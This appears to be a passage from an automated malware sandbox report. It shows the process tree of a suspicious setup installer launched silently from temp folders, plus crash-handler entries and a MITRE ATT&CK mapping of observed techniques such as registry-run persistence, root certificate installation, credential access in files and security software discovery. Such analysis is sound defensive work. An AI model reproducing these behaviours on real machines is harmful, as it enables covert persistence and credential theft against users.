"C:\Users\Admin\AppData\Local\Temp\is-S66JA.tmp\Setup3310.tmp" /SL5="$20774,138429,56832,C:\Users\Admin\AppData\Local\Temp\rcnm1ul0w3m\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:9936
- C:\Users\Admin\AppData\Local\Temp\is-QECJC.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-QECJC.tmp\Setup.exe" /Verysilent
  2⤵
  PID:9952

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\f5b037cc72004a5390149ff211be5763 /t 504 /p 2916
1⤵
PID:10608

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10644

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4740 -s 1096
1⤵
- Program crash
PID:9808

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery